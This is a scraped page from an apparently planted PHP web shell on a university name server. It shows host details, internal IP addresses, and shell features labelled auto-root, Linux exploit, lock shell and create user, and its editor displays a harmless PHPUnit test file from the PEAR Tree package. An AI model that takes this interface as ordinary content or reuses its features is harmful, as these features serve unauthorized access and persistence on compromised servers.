Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
Tree /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
AllTests.php
1.23
KB
-rw-r--r--
getElementTest.php
5.25
KB
-rw-r--r--
getIdByPathTest.php
1.5
KB
-rw-r--r--
getLevelTest.php
1.43
KB
-rw-r--r--
getPathTest.php
1.46
KB
-rw-r--r--
moveTest.php
4.97
KB
-rw-r--r--
removeTest.php
3.84
KB
-rw-r--r--
sql.php
1.53
KB
-rw-r--r--
TreeHelper.php
3.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getIdByPathTest.php
<?php // // $Id: getIdByPathTest.php 320812 2011-12-09 23:49:34Z danielc $ // require_once dirname(__FILE__) . '/TreeHelper.php'; class tests_getIdByPathTest extends TreeHelper { // check if we get the right ID, for the given path function test_MemoryDBnested() { $tree = $this->getMemoryDBnested(); $id = $tree->getIdByPath('/Root/child 2/child 2_2'); $this->assertEquals(5, $id); } function test_MemoryMDBnested() { if (!$this->has_mdb) { $this->markTestSkipped('MDB is not installed'); } $tree = $this->getMemoryMDBnested(); $id = $tree->getIdByPath('/Root/child 2/child 2_2'); $this->assertEquals(5, $id); } // do this for XML // do this for Filesystem // do this for DBsimple // do this for DynamicDBnested function test_DynamicDBnested() { $tree = $this->getDynamicDBnested(); $id = $tree->getIdByPath('/Root/child 2/child 2_2'); $this->assertEquals(5, $id,'This is not implemented, yet!!! (This test should fail ... for now)'); } function test_DynamicMDBnested() { if (!$this->has_mdb) { $this->markTestSkipped('MDB is not installed'); } $tree = $this->getDynamicMDBnested(); $id = $tree->getIdByPath('/Root/child 2/child 2_2'); $this->assertEquals(5, $id,'This is not implemented, yet!!! (This test should fail ... for now)'); } } ?>
Close